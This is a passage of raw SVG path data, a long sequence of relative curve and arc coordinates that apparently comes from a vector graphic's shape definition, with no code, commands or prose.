1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1